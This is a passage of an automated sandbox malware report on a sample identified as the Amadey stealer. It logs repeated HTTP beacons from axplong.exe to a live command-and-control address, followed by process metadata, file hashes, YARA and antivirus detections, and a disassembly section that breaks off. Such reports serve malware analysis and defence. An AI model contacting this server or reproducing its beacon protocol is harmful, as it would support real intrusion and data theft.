                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  67192.168.2.449804185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:12.894805908 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:13.611041069 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  68192.168.2.449805185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:13.759890079 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:14.458631992 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  69192.168.2.449806185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:14.469579935 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:15.163230896 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  70192.168.2.449807185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:15.276288033 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:15.992047071 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  71192.168.2.449808185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:16.000624895 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:16.723073006 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  72192.168.2.449809185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:16.853842020 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:17.549241066 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  73192.168.2.449810185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:17.558481932 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:18.270868063 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  74192.168.2.449811185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:18.385695934 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:19.096256018 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  75192.168.2.449812185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:19.106663942 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:19.828675032 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  76192.168.2.449813185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:19.946607113 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:20.647104979 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  77192.168.2.449814185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:20.655774117 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:21.355776072 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  78192.168.2.449815185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:21.478291988 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:22.181855917 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  79192.168.2.449816185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:22.192008972 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:22.887567997 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  80192.168.2.449817185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:23.009463072 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:23.717819929 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  81192.168.2.449818185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:23.726886988 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:24.452426910 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  82192.168.2.449819185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:24.574521065 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:25.276405096 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  83192.168.2.449820185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:25.285687923 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:26.000459909 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  84192.168.2.449821185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:26.119631052 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:26.847058058 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:07:52:20
                  Start date:25/09/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0xd70000
                  File size:1'965'056 bytes
                  MD5 hash:48D34A4AC51F1A89E010B64FA8CFDCC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1829925792.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1789238154.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:1
                  Start time:07:52:23
                  Start date:25/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Imagebase:0x730000
                  File size:1'965'056 bytes
                  MD5 hash:48D34A4AC51F1A89E010B64FA8CFDCC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1819093932.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1859481096.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 53%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:5
                  Start time:07:53:00
                  Start date:25/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Imagebase:0x730000
                  File size:1'965'056 bytes
                  MD5 hash:48D34A4AC51F1A89E010B64FA8CFDCC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2185572649.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 04EA00CF Relevance: .1, Instructions: 88COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cae4558eb24f98a77acc83855788f9b0e27b6c4f4bfcdd6ab50b6c6e8d7874c3
                    • Instruction ID: fd7da67423f849e41ab897fa4b14f968cdbdcf2e9e5736a6ad4df0b3eb140985
                    • Opcode Fuzzy Hash: cae4558eb24f98a77acc83855788f9b0e27b6c4f4bfcdd6ab50b6c6e8d7874c3
                    • Instruction Fuzzy Hash: 2C11A3E734C211BDA0819C455BA89F7265EF3EA734330A617F507CE502B2547A797131
                    Function 04EA0109 Relevance: .1, Instructions: 93COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1751d25a92a0a71fa0f6cd9080fcc80302777de92c3be2a2fb07233bec2a1ccd
                    • Instruction ID: 34cb3eb9d020db87e0713fd95058f2e7879e336ffc2874a33fce0bce32a5befa
                    • Opcode Fuzzy Hash: 1751d25a92a0a71fa0f6cd9080fcc80302777de92c3be2a2fb07233bec2a1ccd
                    • Instruction Fuzzy Hash: 351138A724C301ADE1818D5457A8AFA6B9DF7EB3383306663F047CF602F26439756232
                    Function 04EA0139 Relevance: .1, Instructions: 91COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2b88bf04142e27d3d77ebbeac009944445f9a7a78bf40efd94b62a0bcf5f504
                    • Instruction ID: 4f01decda102a92e12f3b80cd86bff9eb16b05f26f876faa545780a684bf5d64
